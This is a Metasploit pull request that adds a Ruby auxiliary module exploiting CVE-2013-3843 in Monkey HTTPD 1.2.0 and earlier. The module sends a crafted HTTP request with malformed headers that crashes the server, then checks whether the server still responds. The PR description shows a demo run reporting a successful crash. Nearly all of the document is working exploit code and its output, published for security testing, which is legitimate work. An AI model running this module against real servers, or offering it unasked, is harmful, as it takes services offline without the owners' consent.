### PR TITLE
Land #1950 - Monkey HTTPD Header Parsing Denial-of-Service

### DIFF
--- a/modules/auxiliary/dos/http/monkey_headers.rb
+++ b/modules/auxiliary/dos/http/monkey_headers.rb
@@ -1,0 +1,75 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Auxiliary::Dos
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Monkey HTTPD Header Parsing Denial-of-Service',
+			'Description'    => %q{
+				This module causes improper header parsing that leads to a segmentation fault
+				due to a specially crafted HTTP request. Affects version <= 1.2.0.
+			},
+			'Author'         =>
+				[
+					'Doug Prostko <dougtko[at]gmail.com>'
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					['CVE', '2013-3843'],
+					['URL', 'http://bugs.monkey-project.com/ticket/182']
+				],
+			'DisclosureDate' => 'May 30 2013'))
+
+		register_options(
+			[
+				Opt::RPORT(2001)
+			], self.class)
+	end
+
+	def dos
+		req = "GET / HTTP/1.1\r\n"
+		req << "Host:\r\n\r\nlocalhost\r\n"
+		req << "User-Agent:\r\n\r\n"
+
+		connect
+		sock.put(req)
+		disconnect
+	end
+
+	def is_alive?
+		begin
+			connect
+		rescue Rex::ConnectionRefused
+			return false
+		ensure
+			disconnect
+		end
+
+		true
+	end
+
+	def run
+		print_status("#{rhost}:#{rport} - Sending DoS packet...")
+		dos
+
+		print_status("#{rhost}:#{rport} - Checking server status...")
+		Rex.sleep(1)
+
+		if is_alive?
+			print_error("#{rhost}:#{rport} - Server is still alive")
+		else
+			print_good("#{rhost}:#{rport} - Connection Refused: Success!")
+		end
+	end
+end


### PR DESCRIPTION
This is the reviewed/updated version of pull request #1950. We're landing this one instead because the other one has a lot of unnecessary commit messages.

Demo:

```
msf auxiliary(monkey_headers) > run

[*] 10.0.1.78:2001 - Sending DoS packet...
[*] 10.0.1.78:2001 - Checking server status...
[+] 10.0.1.78:2001 - Connection Refused: Success!
[*] Auxiliary module execution completed
msf auxiliary(monkey_headers) >
```
